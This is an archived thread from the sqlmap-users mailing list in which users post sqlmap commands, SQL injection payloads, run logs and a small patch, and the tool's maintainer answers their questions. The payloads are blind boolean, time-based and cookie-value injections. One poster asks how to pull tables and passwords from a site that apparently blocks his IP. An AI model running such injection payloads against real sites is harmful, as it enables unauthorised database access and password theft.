requests:<br>---<br>Place: GET<br>Parameter: c_sn<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm<br><br> Type: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl<br> ---<br><br>[09:56:08] [INFO] testing MySQL<br>[09:56:08] [INFO] confirming MySQL<br>[09:56:08] [INFO] the back-end DBMS is MySQL<br>web server operating system: Linux CentOS 5<br>web application technology: Apache 2.2.3, PHP 5.1.6<br> back-end DBMS: MySQL >= 5.0.0<br>[09:56:08] [INFO] fetching current user<br>[09:56:08] [INFO] resumed: keyway_db@localhost<br>current user: 'keyway_db@localhost'<br><br>[09:56:08] [INFO] fetching database users privileges<br> [09:56:08] [INFO] fetching database users<br>[09:56:08] [INFO] fetching number of database users<br>[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br> [09:56:08] [INFO] retrieved: <br>[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br> [09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[10:00:12] [CRITICAL] connection timed out to the target url or proxy<br><br>[*] shutting down at 10:00:12<br> <br><br></div><br>------------------------------------------------------------------------------<br> Live Security Virtual Conference<br> Exclusive live event will cover all the ways today's security and<br> threat landscape has changed and how IT managers can respond. Discussions<br> will include endpoint security, mobile security and the latest in malware<br> threats. <a href="http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/" target="_blank">http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/</a><br>_______________________________________________<br> sqlmap-users mailing list<br> <a href="mailto:sql...@li..." target="_blank">sql...@li...</a><br> <a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br> <br></blockquote><p></p><u></u></div><br>------------------------------------------------------------------------------<br> Monitor your physical, virtual and cloud infrastructure from a single<br> web console. Get in-depth insight into apps, servers, databases, vmware,<br> SAP, cloud infrastructure, etc. Download 30-day Free Trial.<br> Pricing starts from $795 for 25 servers or applications!<br> <a href="http://p.sf.net/sfu/zoho_dev2dev_nov" target="_blank">http://p.sf.net/sfu/zoho_dev2dev_nov</a><br>_______________________________________________<br> sqlmap-users mailing list<br> <a href="mailto:sql...@li..." target="_blank">sql...@li...</a><br> <a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br> <br></blockquote></div><u></u></div></blockquote></div></includetail></div> |
|
From: B. <sto...@qq...> - 2012-11-16 05:59:29
|
<div>Hi Stampar,</div><div><br></div><div> THanks for your email , i fix the last problem with your direction .</div><div><br></div><div>but another problem is coming . i have find inject point ,but can't retrieve data . details as followed . </div><div><br></div><div><div>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.xxxx/F/01/product/Products.asp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del="&" --hex -a</div><div><br></div><div> sqlmap/1.0-dev-a40d7a5 - automatic SQL injection and database takeover tool</div><div> http://sqlmap.org</div><div><br></div><div>[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</div><div><br></div><div>[*] starting at 13:53:13</div><div><br></div><div>[13:53:13] [INFO] resuming back-end DBMS 'mysql' </div><div>[13:53:13] [INFO] testing connection to the target url</div><div>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:</div><div>---</div><div>Place: POST</div><div>Parameter: hidJumpId</div><div> Type: boolean-based blind</div><div> Title: AND boolean-based blind - WHERE or HAVING clause</div><div> Payload: hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22</div><div>---</div><div>[13:53:18] [INFO] the back-end DBMS is MySQL</div><div>[13:53:18] [INFO] fetching banner</div><div>[13:53:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval</div><div>[13:53:18] [INFO] retrieved: </div><div>[13:53:18] [INFO] heuristics detected web page charset 'ascii'</div><div>[13:53:18] [INFO] retrieved: </div><div>web server operating system: Windows 2000</div><div>web application technology: ASP, Microsoft IIS 5.0</div><div>back-end DBMS: MySQL 5</div><div>[13:53:18] [INFO] fetching banner</div><div>[13:53:19] [INFO] retrieved: </div><div>[13:53:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'</div><div>banner:<span class="Apple-tab-span" style="white-space:pre"> </span>None</div><div>[13:53:19] [INFO] fetching current user</div><div>[13:53:20] [INFO] retrieved: </div><div>current user:<span class="Apple-tab-span" style="white-space:pre"> </span>None</div><div>[13:53:20] [INFO] fetching current database</div><div>[13:53:21] [INFO] retrieved: </div><div>current database:<span class="Apple-tab-span" style="white-space:pre"> </span>None</div><div>[13:53:21] [INFO] fetching server hostname</div><div>[13:53:22] [INFO] retrieved: </div><div>hostname:<span class="Apple-tab-span" style="white-space:pre"> </span>None</div><div>[13:53:22] [INFO] testing if current user is DBA</div><div>[13:53:22] [INFO] fetching current user</div><div>[13:53:22] [INFO] retrieved: </div><div>current user is DBA: True</div><div>[13:53:23] [INFO] fetching database users</div><div>[13:53:23] [INFO] fetching number of database users</div><div>[13:53:24] [INFO] retrieved: </div><div>[13:53:24] [CRITICAL] unable to retrieve the number of database users</div></div><div><br></div><div>best regards </div><div><br></div><div>bob</div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px">------------------</div><div style="font-size:14px;font-family:Verdana;color:#000;"><font size="+0"> <div><br></div></font></div></div><div><includetail><div><br></div><div style="font-size: 12px;font-family: Arial Narrow;padding:2px 0 2px 0;">------------------ 原始邮件 ------------------</div><div style="font-size: 12px;background:#efefef;padding:8px;"><div><b>发件人:</b> "Miroslav Stampar"<mir...@gm...>;</div><div><b>发送时间:</b> 2012年11月15日(星期四) 下午2:26</div><div><b>收件人:</b> "Bob"<sto...@qq...>; <wbr></div><div></div><div><b>主题:</b> Re: [sqlmap-users] 回复: sqlmap y/N can 't workable</div></div><div><br></div><p dir="ltr">Hi.</p> <p dir="ltr">You are running sqlmap as a background console process. You can't expect from a such process to be able to properly accept console input you do. This is not an sqlmap issue but yours.</p> <p dir="ltr">If you want to run more instances of sqlmap at the same time either open multiple terminals or use some kind of console multiplexer (e.g. screen).</p> <p dir="ltr">Kind regards,<br> Miroslav Stampar</p> <div class="gmail_quote">On Nov 15, 2012 6:53 AM, "Bob" <<a href="mailto:sto...@qq...">sto...@qq...</a>> wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"> <div>HI Iago,</div><div><br></div><div> The sqlmap error .details as followed :</div><div><br></div><div><div>[13:32:02] [INFO] testing connection to the target url</div><div>[13:32:06] [INFO] testing if the url is stable, wait a few seconds</div> <div>[13:32:11] [INFO] url is stable</div><div>[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic</div><div>[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic</div><div> [13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic</div><div>[13:32:14] [WARNING] reflective value(s) found and filtering out</div><div>[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable</div> <div>[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'</div><div>[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'</div><div>[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div> <div>[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable </div><div>[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'</div> <div>[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div><div>[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'</div><div> [13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'</div><div>[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'</div><div>[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'</div> <div>[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'</div><div>[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'</div><div>[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'</div> <div>[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'</div><div>[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'</div><div>[13:33:41] [INFO] testing 'Oracle AND time-based blind'</div> <div>[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found</div> <div>[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'</div> <div>[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive</div><div>[13:34:12] [INFO] heuristics detected web page charset 'ascii'</div><div>POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</div> <div>N: command not found</div><div><br></div><div>[4]+ Stopped ./sqlmap.py -u "<a href="http://XXXp" target="_blank">http://XXXp</a>" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div> <div><br></div><div>[4]+ Stopped ./sqlmap.py -u "<a href="http://XXX" target="_blank">http://XXX</a>" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div> </div><div><br></div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px"><br></div><div style="font-size:14px;font-family:Verdana"><font size="+0"> <div> </div></font></div></div><div> </div><div><u></u><div><br></div><div><br></div><div style="font-size:12px;font-family:Arial Narrow;padding:2px 0 2px 0">------------------ 原始邮件 ------------------</div><div style="font-size:12px;background:#efefef;padding:8px"> <div><b>发件人:</b> "Iago Sousa"<<a href="mailto:146...@gm..." target="_blank">146...@gm...</a>>;</div><div><b>发送时间:</b> 2012年6月24日(星期天) 中午12:33</div><div><b>收件人:</b> "Bob"<<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>>; <u></u></div> <div><b>抄送:</b> "sqlmap-users"<<a href="mailto:sql...@li..." target="_blank">sql...@li...</a>>; <u></u></div><div><b>主题:</b> Re: [sqlmap-users] sqlmap always tell Connection timed out to thetarget url</div> </div><div><br></div><p>I think that the site is blocking your ip address.</p> <p></p><blockquote type="cite">On Jun 23, 2012 11:09 PM, "Bob" <<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>> wrote:<br><br><div><br>Hi all,<br><br> I am use sqlmap to retrieve database <br> <br> current-user and current-db can workable <br><br>retrieve tables ,passwords etc will response time out <br><br>Could you tell me what is the problem ? how i can retrieve tables and passwords ?<br><br>Thanks <br><br>bob<br> [09:56:07] [INFO] testing connection to the target url<br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: c_sn<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm<br><br> Type: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl<br> ---<br><br>[09:56:08] [INFO] testing MySQL<br>[09:56:08] [INFO] confirming MySQL<br>[09:56:08] [INFO] the back-end DBMS is MySQL<br>web server operating system: Linux CentOS 5<br>web application technology: Apache 2.2.3, PHP 5.1.6<br> back-end DBMS: MySQL >= 5.0.0<br>[09:56:08] [INFO] fetching current user<br>[09:56:08] [INFO] resumed: keyway_db@localhost<br>current user: 'keyway_db@localhost'<br><br>[09:56:08] [INFO] fetching database users privileges<br> [09:56:08] [INFO] fetching database users<br>[09:56:08] [INFO] fetching number of database users<br>[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br> [09:56:08] [INFO] retrieved: <br>[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br> [09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[10:00:12] [CRITICAL] connection timed out to the target url or proxy<br><br>[*] shutting down at 10:00:12<br> <br><br></div><br>------------------------------------------------------------------------------<br> Live Security Virtual Conference<br> Exclusive live event will cover all the ways today's security and<br> threat landscape has changed and how IT managers can respond. Discussions<br> will include endpoint security, mobile security and the latest in malware<br> threats. <a href="http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/" target="_blank">http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/</a><br>_______________________________________________<br> sqlmap-users mailing list<br> <a href="mailto:sql...@li..." target="_blank">sql...@li...</a><br> <a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br> <br></blockquote><p></p><u></u></div><br>------------------------------------------------------------------------------<br> Monitor your physical, virtual and cloud infrastructure from a single<br> web console. Get in-depth insight into apps, servers, databases, vmware,<br> SAP, cloud infrastructure, etc. Download 30-day Free Trial.<br> Pricing starts from $795 for 25 servers or applications!<br> <a href="http://p.sf.net/sfu/zoho_dev2dev_nov" target="_blank">http://p.sf.net/sfu/zoho_dev2dev_nov</a><br>_______________________________________________<br> sqlmap-users mailing list<br> <a href="mailto:sql...@li...">sql...@li...</a><br> <a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br> <br></blockquote></div></includetail></div> |
|
From: B. <sto...@qq...> - 2012-11-15 05:52:17
|
<div>HI Iago,</div><div><br></div><div> The sqlmap error .details as followed :</div><div><br></div><div><div>[13:32:02] [INFO] testing connection to the target url</div><div>[13:32:06] [INFO] testing if the url is stable, wait a few seconds</div><div>[13:32:11] [INFO] url is stable</div><div>[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic</div><div>[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic</div><div>[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic</div><div>[13:32:14] [WARNING] reflective value(s) found and filtering out</div><div>[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable</div><div>[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'</div><div>[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'</div><div>[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div><div>[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable </div><div>[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'</div><div>[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div><div>[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'</div><div>[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'</div><div>[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'</div><div>[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'</div><div>[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'</div><div>[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'</div><div>[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'</div><div>[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'</div><div>[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'</div><div>[13:33:41] [INFO] testing 'Oracle AND time-based blind'</div><div>[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found</div><div>[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'</div><div>[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive</div><div>[13:34:12] [INFO] heuristics detected web page charset 'ascii'</div><div>POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</div><div>N: command not found</div><div><br></div><div>[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div><div><br></div><div>[4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div></div><div><br></div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px"><br></div><div style="font-size:14px;font-family:Verdana;color:#000;"><font size="+0"> <div> </div></font></div></div><div> </div><div><includetail><div><br></div><div><br></div><div style="font-size: 12px;font-family: Arial Narrow;padding:2px 0 2px 0;">------------------ 原始邮件 ------------------</div><div style="font-size: 12px;background:#efefef;padding:8px;"><div><b>发件人:</b> "Iago Sousa"<146...@gm...>;</div><div><b>发送时间:</b> 2012年6月24日(星期天) 中午12:33</div><div><b>收件人:</b> "Bob"<sto...@qq...>; <wbr></div><div><b>抄送:</b> "sqlmap-users"<sql...@li...>; <wbr></div><div><b>主题:</b> Re: [sqlmap-users] sqlmap always tell Connection timed out to thetarget url</div></div><div><br></div><p>I think that the site is blocking your ip address.</p> <p></p><blockquote type="cite">On Jun 23, 2012 11:09 PM, "Bob" <<a href="mailto:sto...@qq...">sto...@qq...</a>> wrote:<br><br><div><br>Hi all,<br><br> I am use sqlmap to retrieve database <br><br> current-user and current-db can workable <br><br>retrieve tables ,passwords etc will response time out <br><br>Could you tell me what is the problem ? how i can retrieve tables and passwords ?<br><br>Thanks <br><br>bob<br> [09:56:07] [INFO] testing connection to the target url<br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: c_sn<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm<br><br> Type: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl<br> ---<br><br>[09:56:08] [INFO] testing MySQL<br>[09:56:08] [INFO] confirming MySQL<br>[09:56:08] [INFO] the back-end DBMS is MySQL<br>web server operating system: Linux CentOS 5<br>web application technology: Apache 2.2.3, PHP 5.1.6<br> back-end DBMS: MySQL >= 5.0.0<br>[09:56:08] [INFO] fetching current user<br>[09:56:08] [INFO] resumed: keyway_db@localhost<br>current user: 'keyway_db@localhost'<br><br>[09:56:08] [INFO] fetching database users privileges<br> [09:56:08] [INFO] fetching database users<br>[09:56:08] [INFO] fetching number of database users<br>[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br> [09:56:08] [INFO] retrieved: <br>[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br> [09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>[10:00:12] [CRITICAL] connection timed out to the target url or proxy<br><br>[*] shutting down at 10:00:12<br> <br><br></div><br>------------------------------------------------------------------------------<br> Live Security Virtual Conference<br> Exclusive live event will cover all the ways today's security and<br> threat landscape has changed and how IT managers can respond. Discussions<br> will include endpoint security, mobile security and the latest in malware<br> threats. <a href="http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/" target="_blank">http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/</a><br>_______________________________________________<br> sqlmap-users mailing list<br> <a href="mailto:sql...@li...">sql...@li...</a><br> <a href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br> <br></blockquote><p></p></includetail></div> |
|
From: Miroslav S. <mir...@gm...> - 2012-11-14 17:57:38
|
Hi Dennis. 1) Custom injection marker (*) is not yet supported inside cookie values 2) I believe that you really want to use --suffix="and 'qwer'='qwer ,tzu-345" instead of --suffix=" ,tzu-345" Kind regards, Miroslav Stampar On Wed, Nov 14, 2012 at 6:33 PM, Dennis <kor...@ya...> wrote: > Hi guys, > > I'm experiencing a weird behavior when injecting into a cookie value. > > The cookie in the request looks like this (yes the spaces are intentional): > Cookie: foocookie=asd ,rrr-123 ,tzu-345 > > The injection is possible after the rrr-123 and before the first space. > Neat and straight-forward boolean based blind. Something like > Cookie: foocookie=asd ,rrr-123' and 34=34 and 'qe'='qe ,tzu-345 > or > Cookie: foocookie=asd ,rrr-123' and 34+2=36 and 'qe'='qe ,tzu-345 > gets the job done. > > First problem: It seems I cannot define custom injection points (*) in > cookies. I fixed this by using a request file and terminating the cookie > string after rrr-123 and adding the rest of the cookie value as > --suffix=" ,tzu-345". Works fine. > > Second problem: sqlmap thinks it finds the boolean based injection, then > wildly tries to union inject. This fails and the boolean based injection > is discarded as false positive. > > Checking the payloads in burp, it seems that sqlmap does the following > checks: > Cookie: foocookie=asd ,rrr-123' and 3456=3456 ,tzu-345 > Cookie: foocookie=asd ,rrr-123') and 5678=5678 ,tzu-345 > Cookie: foocookie=asd ,rrr-123')) and 1234=1234 ,tzu-345 > and so on but never tries the obvious (and correct) > Cookie: foocookie=asd ,rrr-123' and 'qwer'='qwer ,tzu-345 > > With higher level it then goes on with boolean based (comment), etc. > Comparing the payloads, they don't seem to differ from the normal > boolean based payloads. I think there might be a bug? > > Cheers > Dennis > > > ------------------------------------------------------------------------------ > Monitor your physical, virtual and cloud infrastructure from a single > web console. Get in-depth insight into apps, servers, databases, vmware, > SAP, cloud infrastructure, etc. Download 30-day Free Trial. > Pricing starts from $795 for 25 servers or applications! > http://p.sf.net/sfu/zoho_dev2dev_nov > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Dennis <kor...@ya...> - 2012-11-14 17:33:46
|
Hi guys, I'm experiencing a weird behavior when injecting into a cookie value. The cookie in the request looks like this (yes the spaces are intentional): Cookie: foocookie=asd ,rrr-123 ,tzu-345 The injection is possible after the rrr-123 and before the first space. Neat and straight-forward boolean based blind. Something like Cookie: foocookie=asd ,rrr-123' and 34=34 and 'qe'='qe ,tzu-345 or Cookie: foocookie=asd ,rrr-123' and 34+2=36 and 'qe'='qe ,tzu-345 gets the job done. First problem: It seems I cannot define custom injection points (*) in cookies. I fixed this by using a request file and terminating the cookie string after rrr-123 and adding the rest of the cookie value as --suffix=" ,tzu-345". Works fine. Second problem: sqlmap thinks it finds the boolean based injection, then wildly tries to union inject. This fails and the boolean based injection is discarded as false positive. Checking the payloads in burp, it seems that sqlmap does the following checks: Cookie: foocookie=asd ,rrr-123' and 3456=3456 ,tzu-345 Cookie: foocookie=asd ,rrr-123') and 5678=5678 ,tzu-345 Cookie: foocookie=asd ,rrr-123')) and 1234=1234 ,tzu-345 and so on but never tries the obvious (and correct) Cookie: foocookie=asd ,rrr-123' and 'qwer'='qwer ,tzu-345 With higher level it then goes on with boolean based (comment), etc. Comparing the payloads, they don't seem to differ from the normal boolean based payloads. I think there might be a bug? Cheers Dennis |
|
From: Miroslav S. <mir...@gm...> - 2012-11-13 09:21:25
|
Hi. Find it fixed with the latest commit [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/246 On Mon, Nov 12, 2012 at 1:56 AM, Abuse 007 <abu...@gm...> wrote: > Hi, > > I have been testing a web application that is making a POST request with > no data (Content-Length: 0). When I save a captured request to a file for > fuzzing with sqlmap I get the error message "HTTP POST method depends on > HTTP data value to be posted". > > The request looks like this (modified to protect the guilty): - > > POST /include/cgiscript.php/function_name?p1=123&p2=A HTTP/1.1 > Host: test.local > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 > Firefox/14.0.1 > Accept: application/json, text/javascript, */*; q=0.01 > Accept-Language: en-gb,en;q=0.5 > Accept-Encoding: gzip, deflate > Connection: keep-alive > X-Requested-With: XMLHttpRequest > Referer: https://test.local/include/cgiscript.php/other_function > Cookie: o4wPHP=1; > a_param=%22%5B%7B%5C%22lots_of_data%5C%22%7D%5D%22; Pragma: no-cache > Cache-Control: no-cache > Content-Length: 0 > > > I'm using a git clone, I'm at: - > commit f305dde413afde13d64422a4e5425edeb4ecd22a > Author: Miroslav Stampar <mir...@gm...> > Date: Sat Nov 10 11:01:29 2012 +0100 > > I've made the following change as a work-around for me. > > diff --git a/lib/core/target.py b/lib/core/target.py > index ec0bd8e..7873bc9 100644 > --- a/lib/core/target.py > +++ b/lib/core/target.py > @@ -82,7 +82,8 @@ def __setRequestParams(): > # Perform checks on POST parameters > if conf.method == HTTPMETHOD.POST and not conf.data: > errMsg = "HTTP POST method depends on HTTP data value to be > posted" > - raise sqlmapSyntaxException, errMsg > + logger.warn(errMsg) # added by eh > + #raise sqlmapSyntaxException, errMsg > > if conf.data: > conf.method = HTTPMETHOD.POST > > ----------------------------- > > I haven't had time to research this further, but I thought I'd raise it in > case others find it useful and in case it helps improve sqlmap. > > Is the post the web application is having Firefox make legal? Is this > over-zealous protocol enforcement by sqlmap? > Is there a better way than to do this, that I'm unaware of (missing), like > a command argument? > Or should an enhancement be made to allow HTTP POSTs with 0 data (at least > for XMLHttpRequest)? > > Thanks, > Abu > > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_nov > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Abuse 0. <abu...@gm...> - 2012-11-12 03:20:18
|
Hi, When looking at HTTP Requests and Response, by using verbose level 6 (-v 6), sqlmap does not show the full HTTP response with the HTTP 302 Moved Temporarily. sqlmap got a 302 redirect to 'http://removed/removed.shtml'. Do you want to follow? [Y/n] y [14:07:02] [INFO] heuristics detected web page charset 'ascii' [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Object Moved): Connection: close Content-type: text/html Location: https://removed/removed.shtml Cache-control: private [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Moved Temporarily): In the body of the first HTTP Response, the 302 temporary redirect, is the result of the SQL injection. If I don't follow the redirection then I see the result. This is fine (to me at least), I just didn't realise or expect it at first. I expected that verbose 6 would show all of the responses, particularly those that contain the results that sqlmap is returning. Cheers, Abu |
|
From: Abuse 0. <abu...@gm...> - 2012-11-12 00:56:51
|
Hi,
I have been testing a web application that is making a POST request with no
data (Content-Length: 0). When I save a captured request to a file for
fuzzing with sqlmap I get the error message "HTTP POST method depends on
HTTP data value to be posted".
The request looks like this (modified to protect the guilty): -
POST /include/cgiscript.php/function_name?p1=123&p2=A HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://test.local/include/cgiscript.php/other_function
Cookie: o4wPHP=1;
a_param=%22%5B%7B%5C%22lots_of_data%5C%22%7D%5D%22; Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
I'm using a git clone, I'm at: -
commit f305dde413afde13d64422a4e5425edeb4ecd22a
Author: Miroslav Stampar <mir...@gm...>
Date: Sat Nov 10 11:01:29 2012 +0100
I've made the following change as a work-around for me.
diff --git a/lib/core/target.py b/lib/core/target.py
index ec0bd8e..7873bc9 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -82,7 +82,8 @@ def __setRequestParams():
# Perform checks on POST parameters
if conf.method == HTTPMETHOD.POST and not conf.data:
errMsg = "HTTP POST method depends on HTTP data value to be posted"
- raise sqlmapSyntaxException, errMsg
+ logger.warn(errMsg) # added by eh
+ #raise sqlmapSyntaxException, errMsg
if conf.data:
conf.method = HTTPMETHOD.POST
-----------------------------
I haven't had time to research this further, but I thought I'd raise it in
case others find it useful and in case it helps improve sqlmap.
Is the post the web application is having Firefox make legal? Is this
over-zealous protocol enforcement by sqlmap?
Is there a better way than to do this, that I'm unaware of (missing), like
a command argument?
Or should an enhancement be made to allow HTTP POSTs with 0 data (at least
for XMLHttpRequest)?
Thanks,
Abu
|
|
From: root <ro...@cn...> - 2012-11-09 14:00:42
|
no,i not modified sqlmap's files
thanks&Best Regards
thks&Best Regards
From: Luka Pušić
Date: 2012-11-08 13:28
To: root
CC: sqlmap-users
Subject: Re: [sqlmap-users] GitHub for Windows
